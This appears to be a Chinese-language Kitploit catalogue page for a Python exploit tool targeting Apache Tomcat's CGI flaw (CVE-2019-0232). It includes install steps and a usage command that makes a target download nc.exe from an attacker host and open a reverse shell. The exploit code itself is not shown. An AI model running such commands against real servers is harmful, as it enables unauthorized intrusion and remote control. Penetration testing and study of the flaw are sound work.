Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-0232_tomcat_cgi_exploit — 针对Apache Tomcat CGI漏洞的CVE-2019-0232 Python漏洞利用工具,具有自动反向shell连接和可自定义的目标/攻击者参数。 | Kitploit
工具/GitHubGitHub/x3m1sec/cve-2019-0232_tomcat_cgi_exploit
Payload生成漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试学习与教育
GitHubx3m1sec/cve-2019-0232_tomcat_cgi_exploit

CVE-2019-0232_tomcat_cgi_exploit

针对Apache Tomcat CGI漏洞的CVE-2019-0232 Python漏洞利用工具,具有自动反向shell连接和可自定义的目标/攻击者参数。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1年前尚未审核

Apache Tomcat CGI 漏洞利用脚本

描述

一个 Python 脚本,用于通过执行反向 shell 连接来利用 Apache Tomcat 服务器上的 CGI 漏洞。

使用示例

脚本执行示例

特性

  • 自动化利用 Apache Tomcat CGI 漏洞
  • 可自定义目标和攻击者参数
  • 简洁的命令行界面

先决条件

  • Python 3.x
  • requests 库
  • Netcat (nc.exe)
  • 能够接收反向 shell 的监听器

安装

root@kitploit:~
git clone <仓库地址>
cd <仓库目录>
pip install requests

使用

root@kitploit:~
python3 tomcat_cgi_exploit.py -t <目标IP> -i <攻击者IP> -ncp <反向SHELL端口>

必选参数

  • -t, --target:运行 Apache Tomcat 的目标 IP 地址
  • -i, --ip:托管 nc.exe 的攻击者 IP 地址
  • -ncp, --nc-port:反向 shell 连接的端口

可选参数

  • -p, --port:目标端口(默认:8080)
  • -sp, --server-port:用于托管 nc.exe 的服务器端口(默认:80)
  • -cgi, --cgi-script:要利用的 CGI 脚本名称(默认:cmd.bat)

示例

root@kitploit:~
python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444

法律免责声明

本工具仅用于教育目的和已授权的渗透测试。作者和贡献者不对任何滥用或本脚本造成的损害负责。在测试任何系统之前,请务必获得适当的授权。

作者

  • Jose Miguel Romero (k3Pn1c)
下载工具